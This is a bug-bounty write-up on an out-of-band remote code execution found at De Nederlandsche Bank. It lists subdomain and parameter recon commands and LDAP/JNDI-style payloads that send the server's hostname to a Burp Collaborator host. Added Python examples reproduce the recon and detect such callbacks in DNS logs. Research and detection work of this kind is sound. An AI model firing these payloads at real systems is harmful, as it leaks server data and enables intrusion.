Out-of-Band Remote Code Execution (RCE) on De Nederlandsche Bank N.V. with Burp Suite Collaborator

Santosh Kumar Sha (@killmongar1996)
Published in InfoSec Write-ups
4 min read · Aug 28, 2022

Hi everyone,

My name is Santosh Kumar Sha. I'm a security researcher/ethical hacker from India (Assam). In this article I describe how I found an out-of-band remote code execution (RCE) on De Nederlandsche Bank N.V. using Burp Suite Collaborator.

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

Special note:

Don't go outside the test scope without permission. Stay safe and hack safe. A special request to my fellow bug-bounty hunters: take care of your health and always abide by the rules of engagement.

Tools used for the exploitation:

1. Subfinder (https://github.com/projectdiscovery/subfinder)
2. httpx (https://github.com/projectdiscovery/httpx)
3. gau, by Corben (https://github.com/lc/gau)
4. waybackurls, by tomnomnom (https://github.com/tomnomnom/waybackurls)
5. Burp Suite (https://portswigger.net/burp)

Story behind the bug:

This is the write-up of how I found an out-of-band RCE on De Nederlandsche Bank N.V. with Burp Suite Collaborator, by fuzzing parameters across several domains at the same time. While casually browsing the main domain I noticed an endpoint that accepted user input, so I entered a payload, but because of a WAF it was not straightforward to execute a command on the server.

Here it goes:

Suppose the target is dnb.nl and everything is in scope:

In-scope: *.dnb.nl

To gather all the subdomains from internet archives I used subfinder, waybackurls and gau.

Command used:

subfinder -d dnb.nl -silent

gau -subs dnb.nl

waybackurls dnb.nl

There is still a chance of missing subdomains, so to stay ahead of the game and not miss any subdomain for testing, I ran subfinder and piped the gau and waybackurls output through unfurl to pull every domain out of the archived URLs, then saved everything to a file.

So the final command will look like this:

gau -subs dnb.nl | unfurl domains >> vul1.txt

waybackurls dnb.nl | unfurl domains >> vul2.txt

subfinder -d dnb.nl -silent >> vul3.txt

Now collect all the subdomains into one file and remove the duplicates:

cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt

Now I have collected all the unique domains and stored them in "unique_sub.txt".

Next, create a custom word-list for parameter fuzzing:

gau -subs dnb.nl | grep "=" | sed 's/.*?//' | sed 's/&/\n/g' | sed 's/=.*//' | sort -u >> param1.txt

waybackurls dnb.nl | grep "=" | sed 's/.*?//' | sed 's/&/\n/g' | sed 's/=.*//' | sort -u >> param2.txt

cat param1.txt param2.txt | sort -u >> param.txt

Now I have collected all the unique parameter names and stored them in "param.txt".

So I have the unique domains and a custom parameter list ready for fuzzing.
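As an added example (not the author's code), here is the same extraction done in Python with urllib.parse over constructed sample URLs. It does what `unfurl domains` and the grep/sed chain do, and also handles URL-encoded keys, `#` fragments, empty `&&` pairs and ports, which the sed one-liner does not.

```python
# Added example (not from the original post): rebuild the recon pipeline
# (unfurl domains / grep "=" | sed ...) as a URL parser. Sample URLs below
# are constructed to look like gau/waybackurls output for the target.
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of archived URLs (not real gau/waybackurls output)
SAMPLE_URLS = """
https://www.dnb.nl/en/search?q=test&page=2
https://app.dnb.nl/login?redirect=%2Fhome&lang=nl#top
https://www.dnb.nl/news?id=1&id=2&&debug=true
https://static.dnb.nl/js/app.js
http://app.dnb.nl:8443/api?file=a.txt
""".strip().splitlines()


def unique_hosts(urls):
    """Equivalent of `unfurl domains | sort -u`: hostnames without scheme or port."""
    hosts = set()
    for u in urls:
        host = urlsplit(u.strip()).hostname  # None when the line is not a URL
        if host:
            hosts.add(host.lower())
    return sorted(hosts)


def unique_params(urls):
    """Equivalent of the grep/sed chain: unique query-parameter names."""
    names = set()
    for u in urls:
        query = urlsplit(u.strip()).query  # fragment ('#top') is already dropped
        # keep_blank_values keeps 'debug=' style keys; empty '&&' pairs are skipped
        for key, _ in parse_qsl(query, keep_blank_values=True):
            names.add(key)
    return sorted(names)


if __name__ == "__main__":
    print("\n".join(unique_hosts(SAMPLE_URLS)))   # one host per line -> unique_sub.txt
    print("\n".join(unique_params(SAMPLE_URLS)))  # one name per line -> param.txt
```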

Now the actual hunting starts: how I achieved out-of-band RCE

While playing around with the endpoint in Burp Repeater I came across a parameter that accepted input, but when I injected an RCE payload it was blocked by the WAF, and the special characters were also being encoded, which was very hard to bypass.
I tried multiple encoding and decoding techniques, multiple WAF-bypass payloads and some custom payloads, but with no success. It was very hard to get past the WAF and the encoding to trigger the RCE.

After trying everything I thought: why not try out-of-band RCE, that is, run a command on the back-end and relay its output to another server, to bypass the WAF.

I didn't have any third-party domain or server to relay the response to, and this is where Burp Collaborator comes in handy. I tried payloads using the curl, ping and nslookup commands pointing at the Burp Collaborator server, but with no success. Then I suddenly remembered that they were using LDAP.

So I finally tried the payload "ldap://test.<burp collaborator_server>" and fortunately received a DNS pingback.

To prove the RCE I decided to escalate and fetch the output of a command executed on the server. I tried this final payload to get the command output back:

“ ldap://${hostname}.<burp collaborator_server>”

Burp Suite process:

Using this method I found multiple out-of-band RCEs with Burp Suite Collaborator, driving the requests with Burp Suite Intruder. I reported all the issues in a single report, and since they all shared the same root cause I was rewarded only once.
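The callback described above leaves a trace on the defender's side: the back-end resolves a name of the form `<leaked value>.<interaction domain>`, and when the leftmost label equals the server's own hostname, `${hostname}` was expanded before the lookup. As an added example (not from the original post), this check runs over constructed BIND-style query-log lines; the interaction domain, internal hostnames and client addresses are all placeholders.

```python
# Added example (not from the original post): flag out-of-band DNS callbacks
# in egress query logs. Log lines, the interaction domain and the internal
# hostnames are constructed placeholders; adapt them to your own environment.
import re

# Domains of OOB/interaction services you want to watch for in egress DNS (placeholder)
INTERACTION_DOMAINS = {"oob-collab.example"}

# Your own server hostnames; a match in the leftmost label means the box
# resolved a name built from its own hostname, i.e. shell expansion happened
INTERNAL_HOSTS = {"web-prd-01", "app-prd-02"}

# Constructed BIND-style query log lines (not real traffic)
SAMPLE_DNS_LOG = """
12-Aug-2022 10:01:02.123 queries: info: client 10.0.1.15#53211: query: www.dnb.nl IN A + (10.0.0.53)
12-Aug-2022 10:01:05.456 queries: info: client 10.0.1.15#53212: query: test.oob-collab.example IN A + (10.0.0.53)
12-Aug-2022 10:01:09.789 queries: info: client 10.0.1.15#53213: query: web-prd-01.oob-collab.example IN A + (10.0.0.53)
12-Aug-2022 10:02:00.000 queries: info: client 10.0.1.22#53214: query: cdn.example.net IN A + (10.0.0.53)
""".strip().splitlines()

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<name>\S+) IN")


def find_oob_callbacks(lines, interaction_domains=INTERACTION_DOMAINS,
                       internal_hosts=INTERNAL_HOSTS):
    """Return (client, queried name, severity) for every lookup of an interaction domain."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        name = m.group("name").rstrip(".").lower()
        for dom in interaction_domains:
            if name == dom or name.endswith("." + dom):
                prefix = name[: -len(dom) - 1] if name != dom else ""
                leaked = prefix.split(".")[0] if prefix else ""
                # the leftmost label is whatever the back-end substituted before resolving;
                # if it is one of our hostnames, command output was exfiltrated via DNS
                sev = "high" if leaked in internal_hosts else "medium"
                hits.append((m.group("client"), name, sev))
    return hits


if __name__ == "__main__":
    for client, name, sev in find_oob_callbacks(SAMPLE_DNS_LOG):
        print(f"{sev:6} {client} -> {name}")
```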

Moral of the story:

Use Burp Suite as an automation tool: it has unlimited power to offer, and you don't need programming knowledge for it, you just need to know how to use it.

Takeaway

I'm sure a lot of security researchers have already seen this process, but this is how I approached finding an out-of-band RCE on De Nederlandsche Bank N.V. with Burp Suite Collaborator.

That's one of the reasons I wanted to share my experience, and also to highlight other techniques for exploiting such vulnerabilities.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.
LinkedIn Profile: https://www.linkedin.com/in/santoshlegend12tech/
